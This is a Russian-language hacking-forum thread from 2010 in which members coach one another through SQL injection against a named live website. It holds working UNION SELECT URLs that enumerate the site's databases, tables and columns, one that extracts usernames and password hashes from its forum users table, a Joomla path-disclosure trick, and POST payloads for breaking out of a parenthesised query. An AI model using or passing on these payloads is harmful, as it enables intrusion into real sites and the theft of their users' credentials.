26.09.2010, 12:51
|
|
Познающий
Регистрация: 09.07.2010
Сообщений: 58
С нами:
8338646
Репутация:
0
|
|
ВОобщем смотрите http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,group_concat%28column_name%29 ,group_concat%28column_name%29,6,7+from+informatio n_schema.columns+where+table_name=0x50524f46494c49 4e47%20-- Так Всё норм а делаю потом так http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,CPU_USER,5,6,7+from+PROFILING +--+ и нечего не получается =( в чём ошибака
|
|
|
26.09.2010, 12:56
|
|
Познающий
Регистрация: 17.04.2009
Сообщений: 59
С нами:
8982831
Репутация:
37
|
|
Сообщение от KandidaT'S
ВОобщем смотрите http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,group_concat%28column_name%29 ,group_concat%28column_name%29,6,7+from+informatio n_schema.columns+where+table_name=0x50524f46494c49 4e47%20-- Так Всё норм а делаю потом так http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,CPU_USER,5,6,7+from+PROFILING +--+ и нечего не получается =( в чём ошибака
Табла PROFILING - системная табла и в ней ничего полезного ты не найдешь, и она находится в счема information_schema. Поэтому перед таблой нужно написать счему откуда выводим.
|
|
|
|
26.09.2010, 13:06
|
|
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
С нами:
8456912
Репутация:
17
|
|
KandidaT'S, давай выведем таблицы:
Сообщение от None
http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,group_concat%28table_name%29, 5,6,7+from+information_schema.tables--
Ну, а дальше выбирай таблицы и выводи колонки таким образом :
Сообщение от None
http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,group_concat%28column_name%29 ,5,6,7+from+information_schema.columns+where+table _name=0x7068706262666f72756d735f61636c5f7573657273--
table_name= TABLE_NAME в Hex виде. Hex вид можно получить тут
Затем, как выведешь колонки, выводи данные так:
Сообщение от None
http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,concat_ws(0x3a,Колонка ,колонка,колонка),5,6,7+from+TABLE_N AME
Где TABLE_NAME - имя таблицы откуда выводим.
|
|
|
|
26.09.2010, 13:34
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от KandidaT'S
ВОобщем смотрите http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,group_concat%28column_name%29 ,group_concat%28column_name%29,6,7+from+informatio n_schema.columns+where+table_name=0x50524f46494c49 4e47%20-- Так Всё норм а делаю потом так http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,CPU_USER,5,6,7+from+PROFILING +--+ и нечего не получается =( в чём ошибака
потому что там ничего нет, а вот это тебе будет интересней
Код:
http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,concat_ws(0x3a,username,user_password),5,6,7+from+xtremelabs_forums.phpbbforums_users+limit+1,1+--+
|
|
|
|
26.09.2010, 13:35
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами:
9000386
Репутация:
1148
|
|
Сообщение от KandidaT'S
ВОобщем смотрите http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,group_concat%28column_name%29 ,group_concat%28column_name%29,6,7+from+informatio n_schema.columns+where+table_name=0x50524f46494c49 4e47%20-- Так Всё норм а делаю потом так http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,CPU_USER,5,6,7+from+PROFILING +--+ и нечего не получается =( в чём ошибака
БД
Код:
http://xtremelabs.org/index.php?location=news&url=-1+union+select+1,2,3,GROUP_CONCAT%28SCHEMA_NAME%20SEPARATOR%200x3a%29%20,5,6,7%20FROM%20information_schema.SCHEMATA
information_schema:xtremelabs_forums:xtremelabs_si te:xtremelabs_tforums
Tables
Код:
http://xtremelabs.org/index.php?location=news&url=-1+union+select+1,2,3,GROUP_CONCAT%28TABLE_NAME%20SEPARATOR%200x3a%29%20,5,6,7%20FROM%20information_schema.TABLES%20limit%200,1
Код:
http://xtremelabs.org/index.php?location=news&url=-1+union+select+1,2,3,database%28%29%20,5,6,7%20FROM%20information_schema.TABLES%20limit%200,1
БД текущая -> xtremelabs_site -> 0x787472656d656c6162735f73697465
Код:
http://xtremelabs.org/index.php?location=news&url=-1+union+select+1,2,3,GROUP_CONCAT%28TABLE_NAME%20SEPARATOR%200x3a%29%20,5,6,7%20FROM%20information_schema.TABLES%20WHERE%20TABLE_SCHEMA=0x787472656d656c6162735f73697465
admins:articles:articlescategories:categories:news :newscategories
там нет таблицы PROFILING, она в другой БД.
Код:
http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,TABLE_SCHEMA%20%20,5,6,7+from+information_schema.TABLES+where+table_name=0x50524f46494c494e47%20--
information_schema
она в схеме
Код:
http://xtremelabs.org/index.php?location=news&url=-1+union+select+1,2,3,%20count%28*%29%20,5,6,7%20FROM%20information_schema.PROFILING
Сообщение от None
Другие новости категории
[01.01.1970]
0
она пустая, там ниче нет.
|
|
|
|
26.09.2010, 14:58
|
|
Познающий
Регистрация: 09.07.2010
Сообщений: 58
С нами:
8338646
Репутация:
0
|
|
Всем Спасибо
|
|
|
|
27.09.2010, 00:51
|
|
Новичок
Регистрация: 01.04.2009
Сообщений: 14
С нами:
9005843
Репутация:
10
|
|
Всем привет,
как можно раскрыть пути в joomla 1.5.
|
|
|
|
27.09.2010, 00:59
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами:
9000386
Репутация:
1148
|
|
копипась моего поста, не помню где он.
Joomla_1.5.15-Stable-Full_Package.zip
у себя проверял
Код:
http://localhost/lastjoom/index.php?limitstart=-5
Сообщение от None
Warning: Invalid argument supplied for foreach() in Z:\home\localhost\www\lastjoom\components\com_cont ent\models\frontpage.php on line 104
может поможет. |
|
|
|
27.09.2010, 01:36
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
э хз как обойти в таком раскладе, может подскажем:
http://localhost/script.php
POST
ref=BIG'
что не пробовал на все одинаков ответ ((
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')' at line 3
Что за трабла тут со скобками?
|
|
|
|
27.09.2010, 06:25
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от YuNi|[c
э хз как обойти в таком раскладе, может подскажем:
http://localhost/script.php
POST
ref=BIG'
что не пробовал на все одинаков ответ ((
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')' at line 3
Что за трабла тут со скобками?
ref=BIG') and 1=0 по идеи должен съесть но ничего из БД не выдать.
ref=BIG') and 1=1 а так выдать
ref=BIG') order by 10000 -- по идеи тоже должно сработать выдать Unknown column '10000'
ну а дальше ты понял, и если у тебя на локалке, то привел бы код из скрипта, который обрабатывает переменную $_POST['ref'] и делает с ней запрос в БД
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
